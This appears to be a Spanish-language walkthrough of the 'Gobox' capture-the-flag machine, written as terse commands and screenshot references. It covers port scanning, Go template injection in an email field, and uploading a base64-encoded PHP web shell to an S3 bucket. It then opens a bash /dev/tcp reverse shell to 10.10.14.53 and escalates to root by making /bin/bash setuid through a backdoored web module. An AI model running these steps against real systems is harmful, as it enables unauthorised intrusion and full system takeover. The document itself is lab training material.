nmap -A -p- -oA gobox 10.129.95.236 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA gobox 10.129.95.236

nmap -sU -O -p- -oA gobox-udp 10.129.95.236

nikto -h 10.129.95.236:80

Pasted image 20220419085851.png

Pasted image 20220419094833.png

whatweb http://10.129.95.236:8080

Pasted image 20220419131719.png

Nos dirigimos a http://10.129.95.236

Pasted image 20220419131529.png

Nos vamos a http://10.129.95.236:8080/forgot

Pasted image 20220419131618.png

Abrimos burpsuite y introducimos credenciales admin admin

Cambiamos email={{.Email}}

Vemos que sale ippsec@hacking.esports

Pasted image 20220419140551.png

Tratamos ahora con lo siguiente

email={{.}}

Pasted image 20220419140710.png

Hacemos el siguiente script para poder hacer un shell.

Pasted image 20220419151731.png

hostname

which aws

aws s3 ls

aws s3 ls s3://website

Pasted image 20220419152058.png

Creamos un archivo data con el reverse shell en php

cat data | base64 -w 0

echo PD9waHak.../Pgo= | base64 -d > /tmp/reverse.php

Pasted image 20220419155759.png

aws s3 cp /tmp/reverse.php s3://website/reverse.php

Pasted image 20220419164730.png

Nos dirigimos a la pagina a ver si podemos hacer un reverse shell

http://10.129.95.236/reverse.php?cmd=bash -c "bash -i >& /dev/tcp/10.10.14.53/443 0>&1"

nc -lvnp 443

Pasted image 20220419164745.png

cd home/ubuntu && cat user.txt

Pasted image 20220419171021.png

uname -a

lsb_release -a

Pasted image 20220419175235.png

cd /usr/lib/modules

curl "http://localhost:8000/?iippsec.run[whoami]"

curl "http://localhost:8000/?iippsec.run[chmod%204755%20%2fbin%2fbash]"

Despues de unos minutos

bash -p

Pasted image 20220419180840.png

boxes

copyright©2022 Cu3rv0x all rights reserved